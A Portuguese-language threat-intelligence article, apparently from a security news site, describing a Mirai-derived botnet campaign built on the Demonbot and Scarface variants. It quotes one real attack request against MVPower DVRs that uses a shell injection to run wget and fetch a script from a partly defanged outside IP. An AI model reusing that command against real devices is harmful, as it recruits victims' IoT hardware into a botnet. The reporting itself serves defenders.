Scarface Botnet

Quando uma ameaça de malware tem o seu código-fonte vazado ou divulgado ao público pelos próprios desenvolvedores, isso permite que até mesmo agentes de ameaças não tão experientes o capturem, façam ajustes para atender melhor às suas necessidades e os liberem em liberdade. Esse comportamento exato foi detectado várias vezes desde que o código do infame Mirai Botnet  foi publicado em fóruns de hackers em 2016.

Um ator de ameaça que se identifica como Prioridade está por trás de uma campanha de ataque envolvendo duas variantes diferentes do Mirai. A primeira carga útil implantada foi baseada na variante Demonbot Mirai e se concentrou especificamente em ataques Hadoop. A segunda carga adotada mais tarde na campanha é muito mais avançada e é baseada na variante Mirai desenvolvida pela Scarface. Scarface é um conhecido desenvolvedor de malware que pegou o código Mirai e tentou torná-lo acessível para hackers novatos com mais facilidade, ao mesmo tempo que adaptou a ameaça para infectar dispositivos da Internet das Coisas (IoT).

A campanha de prioridade se concentra na varredura de várias portas - 500, 5501, 5502, 5050 e 60001, e atacá-las com um único comando com o comando 'GET/shell?Cd%20/tmp;% 20wget% 20http://45(.)13.58.4/TPJ.sh; comando. De acordo com os analistas da Infosec que analisaram a campanha Priority, o invasor parece ter um objetivo específico em mente porque visa principalmente a porta 60001, enquanto as outras quatro servem mais como uma distração do que qualquer outra coisa. Além disso, eles determinaram que a Prioridade deve ser bastante inexperiente, evidenciado pelo fato de que apenas uma única vulnerabilidade foi explorada como um vetor de compromisso - MVPower DVR Shell Unauthenticated Command Execution, em vez da quantidade usual de entre 3 e 7 exploits encontrados em outros semelhantes ameaças.

Todos os ataques iniciais foram lançados por um único endereço IP hospedado em um Virtual Private Server (VPS) fornecido pela Digital Ocean. Os hackers costumam recorrer ao VPS devido à flexibilidade que eles fornecem para configurar um servidor rapidamente e depois eliminá-lo com a mesma rapidez.